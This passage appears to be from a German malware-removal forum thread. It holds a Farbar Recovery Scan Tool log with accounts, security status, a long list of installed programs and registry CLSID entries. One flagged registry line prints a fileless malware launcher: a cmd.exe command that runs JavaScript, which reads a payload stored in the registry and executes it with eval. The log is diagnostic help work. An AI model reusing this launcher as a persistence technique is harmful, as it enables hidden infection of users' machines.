23:03 - 000000000 ____D C:\Program Files (x86)\Windows Defender ==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ======= 2017-02-10 19:24 - 2017-02-10 19:24 - 000000824 _____ () C:\Users\***\AppData\Local\recently-used.xbel 2017-08-08 17:48 - 2017-08-08 17:48 - 000000017 _____ () C:\Users\***\AppData\Local\resmon.resmoncfg 2016-11-05 23:04 - 2016-11-05 23:04 - 000000141 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc ==================== Bamital & volsnap ====================== (Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.) C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert C:\WINDOWS\SysWOW64\wininit.exe FEHLT <==== ACHTUNG C:\WINDOWS\explorer.exe => Datei ist digital signiert C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert C:\WINDOWS\system32\services.exe => Datei ist digital signiert C:\WINDOWS\system32\User32.dll => Datei ist digital signiert C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert LastRegBack: 2017-08-07 19:33 ==================== Ende von FRST.txt ============================ |
09.08.2017, 18:07 | #28 |
| AdditionCode:
ATTFilter Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 09-08-2017 durchgeführt von ***** (09-08-2017 19:01:53) Gestartet von C:\Users\*****\Desktop Windows 7 Ultimate (X64) (2017-04-19 18:18:33) Start-Modus: Normal ========================================================== ==================== Konten: ============================= Administrator (S-1-5-21-1566530412-1856523912-1524002813-500 - Administrator - Disabled) DefaultAccount (S-1-5-21-1566530412-1856523912-1524002813-503 - Limited - Disabled) Gast (S-1-5-21-1566530412-1856523912-1524002813-501 - Limited - Disabled) ***** (S-1-5-21-1566530412-1856523912-1524002813-1001 - Administrator - Enabled) => C:\Users\***** ==================== Sicherheits-Center ======================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.) AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Installierte Programme ====================== (Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.) Akamai NetSession Interface (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Akamai) (Version: - Akamai Technologies, Inc) Ansel (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Ansel) (Version: 384.94 - NVIDIA Corporation) Hidden ARK: Survival Evolved (HKLM\...\Steam App 346110) (Version: - Studio Wildcard) Asmedia ASM104x USB 3.0 Host Controller Driver (HKLM-x32\...\{E4FB0B39-C991-4EE7-95DD-1A1A7857D33D}) (Version: 1.16.12.0 - Asmedia Technology) AVerMedia C353 HD Capture Device 3.3.64.53 (HKLM-x32\...\AVerMedia C353 HD Capture Device) (Version: 3.3.64.53 - AVerMedia TECHNOLOGIES, Inc.) Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment) Borderlands 2 (HKLM-x32\...\Steam App 49520) (Version: - Gearbox Software) CameraHelperMsi (HKLM-x32\...\{15634701-BACE-4449-8B25-1567DA8C9FD3}) (Version: 13.51.815.0 - Logitech) Hidden CCleaner (HKLM\...\CCleaner) (Version: 5.32 - Piriform) Darkest Dungeon (HKLM-x32\...\1450711444_is1) (Version: 20340 - GOG.com) Discord (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Discord) (Version: 0.0.297 - Hammer & Chisel, Inc.) Dragon Age™: Inquisition (HKLM-x32\...\{DC4C36DC-4E5B-4262-B0C7-157DF534B969}) (Version: 1.0.0.12 - Electronic Arts) Dropbox (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Dropbox) (Version: 32.4.21 - Dropbox, Inc.) Dual-Core Optimizer (HKLM-x32\...\{9FD6F1A8-5550-46AF-8509-271DF0E768B5}) (Version: 1.1.4.0169 - AMD) Elite Dangerous: Horizons (HKLM-x32\...\Steam App 419270) (Version: - Frontier Developments) Elite: Dangerous (HKLM-x32\...\Steam App 359320) (Version: - Frontier Developments) Endless Space (HKLM-x32\...\Steam App 208140) (Version: - AMPLITUDE Studios) erLT (HKLM-x32\...\{3EE9BCAE-E9A9-45E5-9B1C-83A4D357E05C}) (Version: 1.20.138.34 - Logitech, Inc.) Hidden EVE Online (HKLM\...\Steam App 8500) (Version: - CCP) Fallout 4 (HKLM-x32\...\Steam App 377160) (Version: - Bethesda Game Studios) ForHonor (HKLM-x32\...\Uplay Install 569) (Version: - Ubisoft) Galactic Civilizations III (HKLM\...\Steam App 226860) (Version: - Stardock Entertainment) GameLauncherRemoval (KCD Beta Access) (HKLM-x32\...\{64189CD8-0B86-4F81-9C05-584E60386D66}) (Version: 1.0.0.0 - Warhorse Studios) Hidden Google Chrome (HKLM-x32\...\Google Chrome) (Version: 60.0.3112.90 - Google Inc.) Google Photos Backup (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Google Photos Backup) (Version: 1.1.2.13 - Google, Inc.) Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.5 - Google Inc.) Hidden Guild Wars 2 (HKLM-x32\...\Guild Wars 2) (Version: - NCsoft Corporation, Ltd.) Hearthstone (HKLM-x32\...\Hearthstone) (Version: - Blizzard Entertainment) Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version: - Blizzard Entertainment) HiPatch (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF000}) (Version: 5.0.3.9 - Hi-Rez Studios) Hi-Rez Studios Authenticate and Update Service (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF1FC}) (Version: 3.0.0.0 - Hi-Rez Studios) Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 10.0.28.1006 - Intel Corporation) Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 13.1.0.1058 - Intel Corporation) Intel(R) Update Manager (HKLM-x32\...\{B991A1BC-DE0F-41B3-9037-B2F948F706EC}) (Version: 3.1.1228 - Intel Corporation) Java 8 Update 144 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180144F0}) (Version: 8.0.1440.1 - Oracle Corporation) KCD Beta Access (HKLM-x32\...\{d2fb0ffd-876a-49ad-a428-fbb255d5d8d2}) (Version: 4.0 - Warhorse Studios) KCD Beta Access (HKLM-x32\...\{FD95EDF6-7B9F-4BD1-8DAD-63D8BDD45B96}) (Version: 4.0 - Warhorse Studios) Hidden League of Legends (HKLM-x32\...\{517CC397-B22F-4593-8DCB-DE72CC541E9A}) (Version: 3.0.1 - Riot Games ) Hidden League of Legends (HKLM-x32\...\League of Legends 3.0.1) (Version: 3.0.1 - Riot Games ) LEGO® Der Herr der Ringe™ (HKLM-x32\...\{C6F20FA7-342A-47A9-A3C8-EB36CABE6419}) (Version: 1.0.0.0 - Warner Bros. Interactive Entertainment) Logitech Gaming Software 8.92 (HKLM\...\Logitech Gaming Software) (Version: 8.92.67 - Logitech Inc.) Logitech SetPoint 6.67 (HKLM\...\sp6) (Version: 6.67.83 - Logitech) Logitech Webcam-Software (HKLM-x32\...\{D40EB009-0499-459c-A8AF-C9C110766215}) (Version: 2.80 - Logitech Inc.) Manager (HKLM-x32\...\{2D00EBC4-DD22-4F5B-9BA1-F98ED2C6FCF2}) (Version: 5.0.15.31893 - 2017 pdfforge GmbH. All rights reserved) Hidden Master of Orion (HKLM\...\Steam App 298050) (Version: - NGD Studios) Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{F2508213-9989-4E85-A078-72BE483917EF}) (Version: 3.5.88.0 - Microsoft Corporation) Microsoft Games for Windows Marketplace (HKLM-x32\...\{4CB0307C-565E-4441-86BE-0DF2E4FB828C}) (Version: 3.5.50.0 - Microsoft Corporation) Microsoft LifeCam (HKLM\...\{5CE7E3F5-9803-4F32-AA89-2D8848A80109}) (Version: 3.60.253.0 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\OneDriveSetup.exe) (Version: 17.3.6816.0313 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{3c3aafc8-d898-43ec-998f-965ffdae065a}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation) Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation) Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang) Minion (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\{Minion}}_is1) (Version: 3.0 - Good Game Mods LLC) Mordheim: City of the Damned (HKLM-x32\...\Steam App 276810) (Version: - Rogue Factor) MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation) MyPhoneExplorer (HKLM-x32\...\MPE) (Version: 1.8.8 - F.J. Wechselberger) No Man's Sky (HKLM\...\Steam App 275850) (Version: - Hello Games) NVIDIA 3D Vision Controller-Treiber 369.04 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 369.04 - NVIDIA Corporation) NVIDIA 3D Vision Treiber 384.94 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 384.94 - NVIDIA Corporation) NVIDIA GeForce Experience 3.8.0.89 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.8.0.89 - NVIDIA Corporation) NVIDIA Grafiktreiber 384.94 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 384.94 - NVIDIA Corporation) NVIDIA HD-Audiotreiber 1.3.34.27 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.27 - NVIDIA Corporation) NVIDIA Miracast Virtueller Ton 355.82 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Miracast.VirtualAudio) (Version: 355.82 - NVIDIA Corporation) NVIDIA PhysX-Systemsoftware 9.17.0524 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0524 - NVIDIA Corporation) NvvHci (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvvHci) (Version: 2.02.0.5 - NVIDIA Corporation) Hidden OLYMPUS Digital Camera Updater (HKLM-x32\...\{962428F4-2E99-4AD2-B55D-B468C18A8A89}) (Version: 2.0.0 - Olympus Corporation) OpenAL (HKLM-x32\...\OpenAL) (Version: - ) OpenOffice 4.1.3 (HKLM-x32\...\{8D5FCC56-BB9F-4122-923C-71753F50F6F5}) (Version: 4.13.9783 - Apache Software Foundation) Origin (HKLM-x32\...\Origin) (Version: 10.4.16.25850 - Electronic Arts, Inc.) Platform (HKLM-x32\...\{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.42 - VIA Technologies, Inc.) Hidden PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.991 - Even Balance, Inc.) Qualcomm Atheros 11AC Drivers (HKLM\...\{45724D31-7270-4A0B-B236-5119CFDA42DB}) (Version: 1.1.47.1058 - Qualcomm Atheros) Hidden Qualcomm Atheros 61x4 Bluetooth Suite (64) (HKLM\...\{628988B4-3FA5-4EA6-BAA3-DA640F6718BD}) (Version: 3.0.0.357 - Qualcomm Atheros) Qualcomm Atheros Bandwidth Control Filter Driver (HKLM\...\{42F56083-A726-4599-A231-EF6200A39AF6}) (Version: 1.1.47.1058 - Qualcomm Atheros) Hidden Qualcomm Atheros Killer E220x Drivers (HKLM\...\{1CC47E9F-A34A-44B3-8C5A-D45C1A3CB94C}) (Version: 1.1.47.1058 - Qualcomm Atheros) Hidden Qualcomm Atheros Killer Performance Suite (HKLM-x32\...\{E70DB50B-10B4-46BC-9DE2-AB8B49E061EE}) (Version: 1.1.47.1058 - Qualcomm Atheros) Qualcomm Atheros Network Manager (HKLM\...\{A32F7F52-0DC5-40EF-84BD-7D30CC20D157}) (Version: 1.1.47.1058 - Qualcomm Atheros) Hidden Rayman Origins (HKLM-x32\...\Uplay Install 80) (Version: - Ubisoft) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8036 - Realtek Semiconductor Corp.) Revo Uninstaller 2.0.3 (HKLM\...\{A28DBDA2-3CC7-4ADC-8BFE-66D7743C6C97}_is1) (Version: 2.0.3 - VS Revo Group, Ltd.) Rise of the Tomb Raider (HKLM\...\Steam App 391220) (Version: - Crystal Dynamics) Samsung Kies (HKLM-x32\...\{758C8301-2696-4855-AF45-534B1200980A}) (Version: 2.6.4.16113.3 - Samsung Electronics Co., Ltd.) Hidden Samsung Kies (HKLM-x32\...\InstallShield_{758C8301-2696-4855-AF45-534B1200980A}) (Version: 2.6.4.16113.3 - Samsung Electronics Co., Ltd.) Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.61.0 - Samsung Electronics Co., Ltd.) SimCity™ (HKLM-x32\...\{F70FDE4B-8F86-4eb6-8C8E-636EC89F6419}) (Version: 4.0.98.0213 - Electronic Arts) Skype Click to Call (HKLM-x32\...\{873F8E7C-10E6-449F-BD7E-5FBA7C8E1C9B}) (Version: 8.5.0.9167 - Microsoft Corporation) Skype Web Plugin (HKLM-x32\...\{E8A70371-2C4D-4B12-831D-6A4BB9AC7AEF}) (Version: 7.29.0.73 - Skype Technologies S.A.) Skype™ 7.38 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.38.101 - Skype Technologies S.A.) Smart Switch (HKLM-x32\...\{74FA5314-85C8-4E2A-907D-D9ECCCB770A7}) (Version: 4.1.17054.16 - Samsung Electronics Co., Ltd.) Hidden Smart Switch (HKLM-x32\...\InstallShield_{74FA5314-85C8-4E2A-907D-D9ECCCB770A7}) (Version: 4.1.17054.16 - Samsung Electronics Co., Ltd.) Smart Technology Programming Software 7.0.27.13 (HKLM\...\{C9193CBB-C31A-412A-A074-AD08F0F2CF3D}) (Version: 7.0.27.13 - Mad Catz) Smite (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF017}) (Version: 4.14.4229.4 - Hi-Rez Studios) Spotify (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Spotify) (Version: 1.0.53.758.gde3fc4b2 - Spotify AB) Star Citizen Launcher (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Star Citizen Launcher) (Version: 00.01.00.00 - Cloud Imperium Games) STAR WARS™ Battlefront™ (HKLM-x32\...\{E402D891-4E45-4ce9-B41F-DD35864EF170}) (Version: 1.0.7.64833 - Electronic Arts) StarCraft II (HKLM-x32\...\StarCraft II) (Version: - Blizzard Entertainment) Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation) Steuer St.Gallen 2016 nP 1.6.0 (HKLM-x32\...\0222-4883-7289-1667) (Version: 1.6.0 - Information Factory AG) TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH) Terraria (HKLM-x32\...\Steam App 105600) (Version: - Re-Logic) The Elder Scrolls Online (HKLM-x32\...\The Elder Scrolls Online) (Version: 1.0.0.0 - Zenimax Online Studios) The Long Dark (HKLM\...\Steam App 305620) (Version: - Hinterland Studio Inc.) The Witcher 3 - Wild Hunt (HKLM-x32\...\1207664643_is1) (Version: 1.31.0.0 - GOG.com) The Witcher 3: Wild Hunt - Blood and Wine (HKLM-x32\...\Blood and Wine_is1) (Version: 1.24.0.0 - GOG.com) The Witcher 3: Wild Hunt - Free DLC program (16 DLC) (HKLM-x32\...\Free DLC program (16 DLC)_is1) (Version: 1.24.0.0 - GOG.com) The Witcher 3: Wild Hunt - Hearts of Stone (HKLM-x32\...\Hearts of Stone_is1) (Version: 1.24.0.0 - GOG.com) Tom Clancy's The Division (HKLM\...\Steam App 365590) (Version: - Massive Entertainment) TomTom MyDrive Connect 4.1.6.3229 (HKLM-x32\...\MyDriveConnect) (Version: 4.1.6.3229 - TomTom) Total War™: WARHAMMER® (HKLM\...\Steam App 364360) (Version: - Creative Assembly) Tyranny (HKLM\...\Steam App 362960) (Version: - Obsidian Entertainment) Uplay (HKLM-x32\...\Uplay) (Version: 5.1 - Ubisoft) VIA Plattform-Geräte-Manager (HKLM-x32\...\InstallShield_{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.42 - VIA Technologies, Inc.) Visual Studio C++ 10.0 Runtime (HKLM-x32\...\{4412F224-3849-4461-A3E9-DEEF8D252790}) (Version: 10.0.0 - TomTom International B.V.) VoiceAttack (HKLM-x32\...\{75E13F4F-139E-4CCA-A5A5-7476E4C5484D}) (Version: 1.4 - VoiceAttack.com) Vulkan Run Time Libraries 1.0.3.0 (HKLM\...\VulkanRT1.0.3.0) (Version: 1.0.3.0 - LunarG, Inc.) Vulkan Run Time Libraries 1.0.42.1 (HKLM\...\VulkanRT1.0.42.1) (Version: 1.0.42.1 - LunarG, Inc.) Warframe (HKLM-x32\...\{EE130AB8-143A-4AA2-B81A-79EC1623C899}) (Version: 1.0.0 - Digital Extremes) Warhammer 40,000: Dawn of War III (HKLM\...\Steam App 285190) (Version: - Relic Entertainment) Warhammer: End Times - Vermintide (HKLM\...\Steam App 235540) (Version: - Fatshark) WestwoodOnline (HKLM-x32\...\{BBCD6D56-8A26-4DDE-9482-DBC9C7B7341D}) (Version: - ) Windows 10 Update and Privacy Settings (HKLM\...\{293F2009-0145-450B-B4AA-063D43FB368C}) (Version: 1.0.13.0 - Microsoft Corporation) Wolfenstein: The New Order German Edition (HKLM-x32\...\Steam App 288570) (Version: - MachineGames) ==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ========================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{144DF3B2-2402-47AE-9583-5A045929A8D4}\InprocServer32 -> C:\Users\*****\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll (Google Inc.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{A03A51A2-5B59-4ECE-96D1-037F7F2A0D8F}\localserver32 -> C:\Users\*****\AppData\Local\SkypePlugin\7.29.0.73\GatewayVersion-x64.exe (Skype Technologies S.A.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{CBF9CD8C-2714-4F36-B76A-43E6C7547BC2}\localserver32 -> C:\Users\*****\AppData\Local\SkypePlugin\7.29.0.73\EdgeCalling.exe (Skype Technologies S.A.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\*****\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll (Google Inc.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EE1-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EE2-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FBC9D74C-AF55-4309-9FB2-C426E071637F}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FE0A3EA9-4DDA-4B0A-9981-5ABE8F0186CD}\InprocServer32 -> C:\Users\*****\AppData\Local\SkypePlugin\7.29.0.73\GatewayActiveX-x64.dll (Skype Technologies S.A.) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\uwas: cmd.exe /c start "" "C:\Users\*****\AppData\Local\Wqy He\xfoqedfutx.hnen" "javascript:np5aj="n";j6Q0=new ActiveXObject("WScript.Shell");CJH0m="XMmT";Ku05Ci=j6Q0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");JQo0Sr="6SpeO0";eval(Ku05Ci);dYlGfd3="bB6tEkG";" <==== ACHTUNG ShellIconOverlayIdentifiers: ["DropboxExt1"] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.) ShellIconOverlayIdentifiers: ["DropboxExt2"] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.) ShellIconOverlayIdentifiers: ["DropboxExt3"] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.) ShellIconOverlayIdentifiers: ["DropboxExt4"] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.) ShellIconOverlayIdentifiers: ["DropboxExt5"] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.) ShellIconOverlayIdentifiers: ["DropboxExt6"] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.) ShellIconOverlayIdentifiers: ["DropboxExt7"] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.) ShellIconOverlayIdentifiers: ["DropboxExt8"] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.) ContextMenuHandlers1: 